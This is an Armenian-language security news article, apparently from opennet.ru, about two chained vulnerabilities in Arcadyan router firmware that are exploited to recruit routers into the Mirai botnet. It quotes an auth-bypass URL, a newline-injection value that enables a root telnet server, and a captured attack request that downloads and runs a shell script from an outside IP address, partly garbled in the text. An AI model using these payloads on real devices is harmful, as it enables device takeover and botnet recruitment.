Ցանցի վրա զանգվածային հարձակում է գրանցվել տնային երթուղիչների դեմ, որոնց որոնվածը օգտագործում է HTTP սերվերի ներդրում Arcadyan ընկերության կողմից: Սարքերի վրա վերահսկողություն ձեռք բերելու համար օգտագործվում է երկու խոցելիության համադրություն, որը թույլ է տալիս կամայական կոդի հեռակա կատարում արմատային իրավունքներով: Խնդիրն ազդում է Arcadyan-ի, ASUS-ի և Buffalo-ի ADSL երթուղիչների բավականին լայն շրջանակի, ինչպես նաև Beeline ապրանքանիշերի ներքո մատակարարվող սարքերի վրա (խնդիրը հաստատված է Smart Box Flash-ում), Deutsche Telekom-ում, Orange-ում, O2-ում, Telus-ում, Verizon-ում, Vodafone-ում և հեռահաղորդակցության այլ օպերատորներ: Նշվում է, որ խնդիրը Arcadyan որոնվածում առկա է ավելի քան 10 տարի և այս ընթացքում հասցրել է տեղափոխել 20 տարբեր արտադրողների առնվազն 17 սարքի մոդելներ։
Առաջին խոցելիությունը՝ CVE-2021-20090, հնարավորություն է տալիս մուտք գործել ցանկացած վեբ ինտերֆեյսի սկրիպտ՝ առանց վավերացման: Խոցելիության էությունն այն է, որ վեբ ինտերֆեյսում որոշ դիրեկտորիաներ, որոնց միջոցով ուղարկվում են պատկերներ, CSS ֆայլեր և JavaScript սկրիպտներ, հասանելի են առանց նույնականացման: Այս դեպքում, դիրեկտորիաները, որոնց մուտքն առանց վավերացման թույլատրվում է, ստուգվում են նախնական դիմակի միջոցով: Ծնող գրացուցակ գնալու ուղիներում «../» նիշերը նշելն արգելափակված է որոնվածի կողմից, սակայն «..%2f» համակցության օգտագործումը բաց է թողնվում: Այսպիսով, «http://192.168.1.1/images/..%2findex.htm» նման հարցումներ ուղարկելիս հնարավոր է բացել պաշտպանված էջեր:
Երկրորդ խոցելիությունը՝ CVE-2021-20091, թույլ է տալիս վավերացված օգտատիրոջը փոփոխություններ կատարել սարքի համակարգի կարգավորումներում՝ ուղարկելով հատուկ ձևաչափված պարամետրեր application_abstract.cgi սկրիպտին, որը չի ստուգում պարամետրերում նոր տողի նիշի առկայությունը: . Օրինակ, ping գործողություն կատարելիս հարձակվողը կարող է նշել «192.168.1.2%0AARC_SYS_TelnetdEnable=1» արժեքը դաշտում, որտեղ ստուգվում է IP հասցեն, և սկրիպտը, կարգավորումների ֆայլը ստեղծելիս /tmp/etc/config/: .glbcfg, դրա մեջ կգրի «AARC_SYS_TelnetdEnable=1» տողը », որն ակտիվացնում է telnetd սերվերը, որն ապահովում է հրամանի վահանակի անսահմանափակ մուտք՝ արմատային իրավունքներով: Նմանապես, AARC_SYS պարամետրը դնելով, դուք կարող եք կատարել ցանկացած կոդ համակարգում: Առաջին խոցելիությունը հնարավորություն է տալիս գործարկել խնդրահարույց սկրիպտը առանց վավերացման՝ մուտք գործելով այն որպես «/images/..%2fapply_abstract.cgi»:
Խոցելիությունը օգտագործելու համար հարձակվողը պետք է կարողանա հարցում ուղարկել ցանցի պորտին, որի վրա աշխատում է վեբ ինտերֆեյսը: Դատելով հարձակման տարածման դինամիկայից՝ շատ օպերատորներ իրենց սարքերին հասանելիություն են թողնում արտաքին ցանցից՝ աջակցության ծառայության կողմից խնդիրների ախտորոշումը պարզեցնելու համար: Եթե ինտերֆեյսի մուտքը սահմանափակվում է միայն ներքին ցանցով, ապա հարձակումը կարող է իրականացվել արտաքին ցանցից՝ օգտագործելով «DNS rebinding» տեխնիկան: Խոցելիություններն արդեն ակտիվորեն օգտագործվում են երթուղիչները Mirai բոտնետին միացնելու համար. POST /images/..%2fapply_abstract.cgi HTTP/1.1 Միացում. փակել User-Agent. Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3. 5%212.192.241.7A ARC_SYS_TelnetdEnable=0& %1AARC_SYS_=cd+/tmp; wget+http://0/lolol.sh; curl+-O+http://212.192.241.72/lolol.sh; chmod+212.192.241.72+lolol.sh; sh+lolol.sh&ARC_ping_status=777&TMP_Ping_Type=0
Source: opennet.ru